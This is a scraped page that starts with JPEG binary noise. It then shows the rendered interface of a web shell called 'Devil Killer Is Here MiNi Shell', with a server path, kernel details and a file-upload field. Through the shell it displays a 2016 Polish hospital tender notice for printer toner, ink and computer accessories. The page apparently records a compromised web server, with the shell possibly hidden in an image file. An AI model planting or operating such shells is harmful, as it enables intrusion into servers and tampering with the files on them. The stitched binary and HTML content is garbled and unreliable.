JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160914/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160914/308239-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 308239 - 2016
              z dnia 2016-09-14 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Szczecin: dostawa artykułów komputerowych do SPSK NR 1 PUM<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Samodzielny Publiczny Szpital Kliniczny Nr 1 PUM w Szczecinie, krajowy numer identyfikacyjny
              28889200000, ul.
              ul. Unii Lubelskiej 
              1,
              71252  
              Szczecin, woj.
              zachodniopomorskie, państwo
              , tel.
              914 253 000, e-mail
              zampub@spsk1.szn.pl, faks
              914 253 001.
              <br />
              Adres strony internetowej (URL): www.spsk1.szn.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Podmiot prawa publicznego
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.spsk1.szn.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.spsk1.szn.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br /><br />
                Adres:
                <br />Kancelaria Dyrektora SPSK NR 1 PUM, ul. Unii Lubelskiej 1, 71-252 Szczecin</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>dostawa artykułów komputerowych do SPSK NR 1 PUM<br /><b>Numer referencyjny: </b>OS ZP 63 16<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>PAKIET Nr 1

L.P.	NAZWA ASORTYMENTU	PARAMETRY	ILOŚĆ	J.M.
1	Tusz do drukarki	HP nr 15 czarny	17	szt.
2	Tusz do drukarki	HP nr 17 kolor	3	szt.
3	Tusz do drukarki	HP nr 45 czarny	6	szt.
4	Tusz do drukarki	HP nr 78 kolor	7	szt.
5	Tusz do drukarki	HP nr 56 czarny	39	szt.
6	Tusz do drukarki	HP nr 23D kolor	2	szt.
7	Tusz do drukarki	HP nr 344	8	szt.
8	Tusz do drukarki	HP nr 350XL czarny	2	szt.
9	Tusz do drukarki	HP nr 27 czarny	2	szt.
10	Tusz do drukarki	HP nr 28 kolor	2	szt.
11	Tusz do drukarki	HP nr 338	4	szt.
12	Tusz do drukarki	HP nr 21 czarny	3	szt.
13	Tusz do drukarki	HP nr 339	25	szt.
14	Tusz do drukarki	HP nr 343	2	szt.
15	Tusz do drukarki	HP nr 57 kolor	12	szt.
16	Tusz do drukarki	Canon BX-3CZ	12	szt.
17	Tusz do drukarki	Epson C-86czarny	2	szt.
18	Tusz do drukarki	EpsonDX4000 czarny	2	szt.
19	Tusz do drukarki	Epson DX4000kpi kolor	2	szt.
20	Tusz do drukarki	Lexmark 2300/2400	2	szt.
21	Tusz do nagrywarki Primera	disk Publisher I/II/xR,czarny	10	szt.
22	Tusz do nagrywarki Primera	disk Publisher I/II/xR,kolor	5	szt.
23	Tusz do drukarki	Canon PGI-525 BK	2	szt.
24	Tusz do drukarki	Canon BJC 1000 czarny	2	szt.
25	Tusz do nagrywarki RIMAGE 2000i seriesII	RC1  C8857a	12	szt.
26	Tusz do nagrywarki RIMAGE 2000i seriesII	RB1 C8856a	14	szt.
27	Toner do drukarki	HP 1100	64	szt.
28	Toner do drukarki	HP1320/1160	89	szt.
29	Toner do drukarki	HP 4l	2	szt.
30	Toner do drukarki	HP 1010	167	szt.
31	Toner do drukarki	HP 2550czarny	2	szt.
32	Toner do drukarki	HP 2550 kolor	4	szt.
33	Toner do drukarki	HP 2300	4	szt.
34	Toner do drukarki	HP 1150	51	szt.
35	Toner do drukarki	HP 2100	3	szt.
36	Toner do drukarki	HP 1200	74	szt.
37	Toner do drukarki	HP 2015 czarny	42	szt.
38	Toner do drukarki	HP 2035/2055	74	szt.
39	Toner do drukarki	HP 1600/2600 kolor	29	szt.
40	Toner do drukarki	HP 1600/2600 czarny	17	szt.
41	Toner do drukarki	HP 5L	5	szt.
42	Toner do drukarki	HP 1505	33	szt.
43	Toner do drukarki	HP 1300	23	szt.
44	Toner do drukarki	HP 4650 czarny	5	szt.
45	Toner do drukarki	HP 4650 kolor	7	szt.
46	Toner do drukarki	HP 1215/1518 kolor	2	szt.
47	Toner do drukarki	HP 1215/1518 czarny	2	szt.
48	Toner do drukarki	Toshiba 1350E	3	szt.
49	Toner do drukarki	Toshiba 1550E	3	szt.
50	Toner do drukarki	Toshiba Studio 160   1600	2	szt.
51	Toner do drukarki	fax Philips Magic 3	2	szt.
52	Toner do drukarki	Panasonic KX-FA52	87	szt.
53	Toner do drukarki	Panasonic KX-FA 57A	9	szt.
54	Toner do drukarki	Panasonic KX-FL511FA-83	14	szt.
55	Toner do drukarki	Panasonic KX-FAT 92E	2	szt.
56	Toner do drukarki	Samsung ML2010	64	szt.
57	Toner do drukarki	Samsung SCX4216F	7	szt.
58	Toner do drukarki	Samsung 1610/2510	24	szt.
59	Toner do drukarki	Samsung 2850	10	szt.
60	Toner do drukarki	Xerox 3117	2	szt.
61	Toner do drukarki	Canon IR-1018/1022	17	szt.
62	Toner do drukarki	Canon 1215	2	szt.
63	Toner do drukarki	Canon E30 FC 200/300	3	szt.
64	Toner do drukarki	Canon PC1210D/1270 	2	szt.
65	Toner do drukarki	Canon 6012	2	szt.
66	Toner do drukarki	Canon IR-2016	2	szt.
67	Toner do drukarki	Olivetti D-Copia 164MF	2	szt.
68	Toner do drukarki	Ricoh 1230D/Gestetner MP2000	4	szt.
69	Toner do drukarki	Sharp UX-9CR	5	szt.
70	Toner do drukarki	Koycera TK-18 	4	szt.
71	Toner do drukarki	Lexmark Optra E250/350/352	12	szt.
72	Toner do drukarki	Konika Minolta 1300/1350	8	szt.
73	Toner do drukarki	Nashuatec MP-C2500	2	szt.
74	Toner do drukarki	Ricoh MPC 2500/3000	5	szt.
75	Toner do drukarki	Sharp A-R 5012/122/153	2	szt.
76	Toner do drukarki	HP 2025 czarny	5	szt.
77	Toner do drukarki	HP 2025kolor	14	szt.
78	Toner do drukarki	HP 1005	18	szt.
79	Toner do drukarki	Brother TN 2120	2	szt.
80	Toner do drukarki	Panasonic KX-FL513	2	szt.
81	Toner do drukarki	Brother LC-980 BK black	5	szt.
82	Toner do drukarki	Xerox  Phaser 7400DN kolor	7	szt.
83	Toner do drukarki	Xerox  Phaser 7400DN czarny	4	szt.
84	Toner do drukarki	OKI 3300/3400	2	szt.
85	Toner do drukarki	Ricoh SP 3400	2	szt.
86	Toner do drukarki	Samsung ML 1640	5	szt.
87	Toner do drukarki	Toshiba E-studio 163/165	2	szt.
88	Toner do drukarki	Toshiba E-120	2	szt.
89	Toner do drukarki	Canon FX-10      L-140	4	szt.
90	Toner do drukarki	Canon fax L-380	3	szt.
91	Toner do drukarki	Fax Panasonic KX-FA 136A	4	szt.
92	Toner do drukarki	HP 3015	14	szt.
93	Toner do drukarki	Samsung ML 1600/1665	8	szt.
94	Toner do drukarki	Samsung CLP 315	2	szt.
95	Toner do drukarki	HP 4M/5M	2	szt.
96	Toner do drukarki	HP LJ  P1566	48	szt.
97	Toner do drukarki	Canon 6650	18	szt.
98	Toner do drukarki	Nashuatec D418(Afico)	2	szt.
99	Tusz do drukarki	Canon IP4700 czarny	2	szt.
100	Tusz  do drukarki	Canon IP4700 kolor	4	szt.
101	Toner do drukarki	Brother TN-2110	6	szt.
102	Toner do drukarki	Canon LBP7750 czarny	6	szt.
103	Toner do drukarki	Canon LBP7750 kolor	7	szt.
104	Tusz do drukarki	Canon PGI 520 black	3	szt.
105	Toner do drukarki	Minolta 1600/1690	2	szt.
106	Toner do drukarki	Panasonic KX-FA55A	2	szt.
107	Toner do drukarki	Canon BCI 21 czarny	2	szt.
108	Tusz do drukarki	Canon IP4200 BK czarny	2	szt.
109	Tusz do drukarki	Canon IP4200 BK kolor	2	szt.
110	Toner do drukarki	HP Lj M 1212/P1102(85A)	12	szt.
111	Toner do drukarki	400M PRO  80A black	18	szt.
112	Toner do drukarki	HP LJ M3035xsMFP	4	szt.
113	Toner do drukarki	HP LJ 4050	3	szt.
114	Toner do drukarki	fax Szarp UX-C70B	3	szt.
115	Toner do drukarki	Brother HL-3040CN czarny	7	szt.
116	Toner do drukarki	Brother HL-3040CN kolor	12	szt.
117	Toner do drukarki	HP  P1102w	10	szt.
118	Toner do drukarki	Lexmark X363dn 	26	szt.
119	Toner do drukarki	Lexmark E260dn  	113	szt.
120	Bęben do drukarki	Lexmark X363dn 	2	szt.
121	Bęben do drukarki	Lexmark E260 	23	szt.
122	Bęben do drukarki	CJL 2550/2800	2	szt.
123	Bęben do drukarki	Panasonic KX-FA 84 KX-FL513/613	5	szt.
124	Bęben do drukarki	Imaging Unit PH7400 kolor	4	szt.
125	Bęben do drukarki	Imaging Unit PH7400czarny	3	szt.
126	Bęben do drukarki	Konica Minolta 1350  	8	szt.
127	Taśma do drukarki	SEIKO TP 10/20	2	szt.
128	Taśma do drukarki	OKI 320	3	szt.
129	Taśma do drukarki	Epson FX-2190	5	szt.
130	Taśma do drukarki	Panasonic KXP-1124	2	szt.
131	Taśma LTO ULTRIUM 5	LTO Ultrium 5 1,5TB/3,0TB	12	szt.
132	Taśma do drukarki	Brother DK-22210	2	szt.
133	Płyta CD-R	pakow.pojedyńczo	5000	szt.
134	Płyta DVD+R	4,7GB, Verbatim, pak. pojedyńczo	750	szt.
135	Papier  komputerowy	375x12x2	2	szt.
136	Papier  komputerowy	240mmx12, pojedyńczy	3	szt.
137	Rolka termiczna	57x100	40	szt.
138	Rolka termiczna	57x20	5	szt.
139	Rolka termiczna	110x20	24	szt.
140	Klawiatura komputerowa	uniwersalna	140	szt.
141	Mysz do komputera	uniwersalna	220	szt.
142	Kabel do druk.USB 2.0	USB 2.0    1,8m  A-B	10	szt.
143	Wtyki RJ45	opak.100 szt.	6	op.
144	Karton skrętki UTP kat. 5e	305m, drut	3	szt.
				
Ilekroć w opisie przedmiotu zamówienia pojawiłyby się nazwy własne, oznacza to, iż Zamawiający dopuszcza produkt równoważny.

PAKIET Nr 2

L.P.	NAZWA ASORTYMENTU	PARAMETRY	ILOŚĆ	J.M.



Toner do drukarki HP Laser Jet CP1025 COLOR, oryginał 	Kolory: czarny, czerwony, żółty, niebieski	4	kpl.
Toner do drukarki w  zakresie pakietu Nr 2 powinien  być oryginalny tj. wyprodukowany przez producenta urządzenia do którego jest zamawiany albo równoważny oryginałowi. Przez pojęcie  równoważne -  Zamawiający rozumie produkt nie pochodzący od producenta danego urządzenia, kompatybilny z urządzeniem, od którego jest zamawiany o parametrach (wydajność, pojemność) takich samych lub lepszych w stosunku do oryginału produkowanego przez producenta danego urządzenia. Produkt równoważny nie może być regenerowany tzn. nie może być poddawany procesowi ponownego napełniania. Elementy produktu równoważnego muszą być fabrycznie nowe, nieregenerowane, niefabrykowane, nie wchodzące wcześniej (w całości  lub w części) w skład innych materiałów.

<br /><br /><b>II.5) Główny kod CPV: </b>33125110-5<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 24<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                1)	Koncesji, zezwolenia, licencji  lub dokumentu potwierdzającego, że Wykonawca jest wpisany do jednego z rejestrów zawodowych lub handlowych, prowadzonych w państwie członkowskim Unii Europejskiej w którym Wykonawca ma siedzibę lub miejsce zamieszkania  o ile obowiązek ich posiadania wynika z odrębnych przepisów. <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                - oświadczenia o spełnianiu warunków udziału w postępowaniu - na formularzu oświadczenia stanowiącym załącznik nr 2 do SIWZ.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                1.Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych dostaw (min. 2) w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dowodów wskazujących, że zostały wykonane lub są wykonywane należycie. (załącznik Nr 3 do SIWZ)
Za dostawy wykazujące spełnienie warunku posiadania wiedzy i doświadczenia zamawiający uzna te , które łącznie będą spełniały następujące cechy:
1) dotyczyć będą przedmiotu takiego jak przedmiot zamówienia określony w niniejszym postępowaniu,
2) wartość wykonanej lub wykonywanej dostawy nie może być mniejsza niż 60 000,00 zł brutto.
Za dowody potwierdzające należyte wykonanie lub wykonywanie dostaw, o których mowa powyżej Zamawiający uzna:
-poświadczenia, z tym że w odniesieniu do nadal wykonywanych dostaw okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert  lub oświadczenia wykonawcy  jeżeli z uzasadnionych przyczyn o obiektywnym
charakterze wykonawca nie jest w stanie uzyskać poświadczenia
2.Katalogu lub broszury informacyjnej w języku polskim z zaznaczeniem oferowanego produktu, którego autentyczność musi zostać poświadczona przez Wykonawcę na żądanie Zamawiającego.
3.próbka  egzemplarz pokazowy dla pozycji  72 i 80.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1)	Odpisu z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podst. art. 24 ust 5 pkt 1 Ustawy PZP.
2)	oświadczenia wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej; w przypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1.Koncesji, zezwolenia, licencji  lub dokumentu potwierdzającego, że Wykonawca jest wpisany do jednego z rejestrów zawodowych lub handlowych, prowadzonych w państwie członkowskim Unii Europejskiej w którym Wykonawca ma siedzibę lub miejsce zamieszkania  o ile obowiązek ich posiadania wynika z odrębnych przepisów. 
2.	Wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych dostaw (min. 2) w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dowodów wskazujących, że zostały wykonane lub są wykonywane należycie. (załącznik Nr 3 do SIWZ)
Za dostawy wykazujące spełnienie warunku posiadania wiedzy i doświadczenia zamawiający uzna te , które łącznie będą spełniały następujące cechy:
1) dotyczyć będą przedmiotu takiego jak przedmiot zamówienia określony w niniejszym postępowaniu,
2) wartość wykonanej lub wykonywanej dostawy nie może być mniejsza niż 60 000,00 zł brutto.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
